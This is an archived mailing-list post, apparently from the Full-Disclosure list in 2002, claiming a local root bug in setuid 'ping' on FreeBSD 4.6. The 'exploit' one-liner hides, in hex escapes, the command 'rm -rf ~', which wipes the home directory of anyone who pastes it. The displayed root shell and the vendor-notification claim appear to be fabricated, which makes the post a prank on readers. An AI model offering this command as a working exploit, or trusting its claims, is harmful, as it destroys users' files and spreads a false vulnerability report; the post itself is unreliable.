lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200209151328.g8FDS8R13719@mailserver2.hushmail.com>
From: drdre at hush.com (drdre@...h.com)
Subject: ATTENTION Local Root ATTENTION

DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most unix and unixlike systems. This bug is not remotly exploitable.

Tested on FreeBSD 4.6

bash# id
uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff)

bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error  ^


^

$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)


Vendors are already informed.


Greets: Captain Crunch, Peter Pan, Charly Root


Regards
-- 
DrDre security research group





Get your free encrypted email at https://www.hushmail.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ